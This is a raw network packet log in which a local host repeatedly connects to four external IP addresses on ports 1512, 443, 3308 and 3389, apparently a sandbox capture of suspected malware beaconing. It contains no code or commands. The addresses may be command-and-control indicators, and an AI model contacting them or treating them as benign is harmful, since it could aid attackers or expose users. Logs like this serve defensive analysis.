Jan 12, 2021 01:44:30.898117065 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.919011116 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.919042110 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:31.022955894 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:31.022995949 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:31.023255110 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:31.025177956 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:31.077955008 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:31.135242939 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.187633038 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.187813044 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.189193964 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.241449118 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.256057024 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.256231070 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.272022963 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.326498985 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.326667070 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.337162018 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.337492943 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.389702082 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.389877081 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.427174091 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.442312956 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.560925961 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.560971022 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.561096907 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.561136961 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.566965103 CET	49223	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:31.619196892 CET	443	49223	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:31.682845116 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.726166964 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.726449966 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.727854967 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.770891905 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.788342953 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.788389921 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.788465023 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.788511992 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.804279089 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.849204063 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.849550962 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.858119965 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.858339071 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.901470900 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.901586056 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:31.941499949 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.944928885 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:31.944967031 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:32.057817936 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:32.057871103 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:32.057944059 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:32.057993889 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:32.065239906 CET	49225	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:32.108338118 CET	3308	49225	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:32.182349920 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.237435102 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.237528086 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.238218069 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.292571068 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.313060045 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.313101053 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.313148975 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.313468933 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.318905115 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.381473064 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.381628990 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.392240047 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.392410040 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.446450949 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.446794033 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.486020088 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.500992060 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.501080990 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.591634035 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.591675997 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.591855049 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.598738909 CET	49226	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:32.653042078 CET	3389	49226	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:32.713193893 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.766149998 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:32.766266108 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.767652988 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.820307970 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:32.827253103 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:32.827286959 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:32.827364922 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.827395916 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.885329962 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:32.939454079 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:32.939565897 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.099204063 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.099365950 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.152195930 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.152338028 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.190228939 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.205260992 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.303689957 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.303725004 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.303983927 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.308859110 CET	49228	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:33.361778021 CET	1512	49228	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:33.430649996 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.482733011 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:33.482832909 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.483756065 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.535751104 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:33.550777912 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:33.550973892 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.696320057 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.750754118 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:33.750855923 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.807013988 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.807099104 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.859066010 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:33.859291077 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:33.911273956 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:34.029246092 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:34.029294014 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:34.029418945 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:34.057291985 CET	49229	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:34.109549999 CET	443	49229	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:34.536679983 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.580168009 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.580390930 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.621872902 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.665093899 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.681061029 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.681106091 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.681225061 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.681777954 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.709043980 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.754204035 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.754470110 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.842777967 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.842870951 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.886126995 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.886259079 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:34.926245928 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.929459095 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:34.929486990 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:35.042238951 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:35.042290926 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:35.042439938 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:35.042485952 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:35.051071882 CET	49230	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:35.094388962 CET	3308	49230	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:35.229629993 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.284285069 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.284372091 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.285784960 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.339996099 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.362623930 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.362658024 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.362715960 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.362766981 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.376674891 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.435683012 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.435889006 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.445595980 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.445787907 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.500143051 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.500411034 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.539995909 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.555196047 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.555233002 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.645800114 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.645863056 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.646063089 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.649686098 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.651854992 CET	49231	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:35.706258059 CET	3389	49231	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:35.770592928 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.823527098 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:35.823642969 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.825207949 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.877914906 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:35.885013103 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:35.885042906 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:35.885118008 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.885154963 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.901678085 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.955745935 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:35.956078053 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.966738939 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:35.967041016 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:36.019975901 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.020293951 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:36.062479019 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.073235989 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.073308945 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.178540945 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.178589106 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.178877115 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:36.184976101 CET	49232	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:36.237927914 CET	1512	49232	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:36.301285982 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.354042053 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.354202032 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.355986118 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.408162117 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.422943115 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.423053026 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.440958977 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.495666981 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.495924950 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.505215883 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.505386114 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.557686090 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.557889938 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.595123053 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.610316038 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.728977919 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.729023933 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.729819059 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.735323906 CET	49233	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:36.787852049 CET	443	49233	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:36.847152948 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:36.890305042 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:36.890547991 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:36.892266035 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:36.935385942 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:36.946269035 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:36.946305037 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:36.946460009 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:36.950097084 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:36.960251093 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.005156994 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.005371094 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.015871048 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.016252041 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.059775114 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.060106039 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.103351116 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.215989113 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.216049910 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.216260910 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.221895933 CET	49234	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:37.265055895 CET	3308	49234	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:37.343050003 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.400810957 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.400904894 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.401587009 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.458074093 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.479110003 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.479146004 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.479270935 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.479325056 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.491815090 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.555701971 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.556111097 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.566977978 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.567123890 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.621287107 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.621603966 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.661087990 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.676098108 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.676139116 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.773236036 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.773283958 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.773611069 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.779485941 CET	49235	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:37.834639072 CET	3389	49235	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:37.892316103 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:37.945193052 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:37.945492983 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:37.954569101 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.007316113 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.014105082 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.014141083 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.014210939 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.014239073 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.027642965 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.081724882 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.082087994 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.093031883 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.093306065 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.146219969 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.160257101 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.182301998 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.213315010 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.320853949 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.320899010 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.321192980 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.326562881 CET	49236	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:38.379398108 CET	1512	49236	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:38.438345909 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.490305901 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.490437984 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.492117882 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.543910027 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.558763981 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.558896065 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.572761059 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.626852989 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.627273083 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.638526917 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.638726950 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.690555096 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.690814018 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.727333069 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.742660999 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.742702961 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.860218048 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.860261917 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.860614061 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.866190910 CET	49237	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:38.918029070 CET	443	49237	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:38.984508038 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.027911901 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.028075933 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.029803038 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.072987080 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.085287094 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.085329056 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.085407019 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.085455894 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.102195978 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.147061110 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.147310972 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.156915903 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.157239914 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.200464010 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.200679064 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.243935108 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.359347105 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.359386921 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.359555006 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.361588955 CET	49238	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:39.404786110 CET	3308	49238	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:39.483825922 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.538307905 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.538394928 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.539072990 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.593539953 CET	3389	49239	5.100.228.233	192.168.2.22
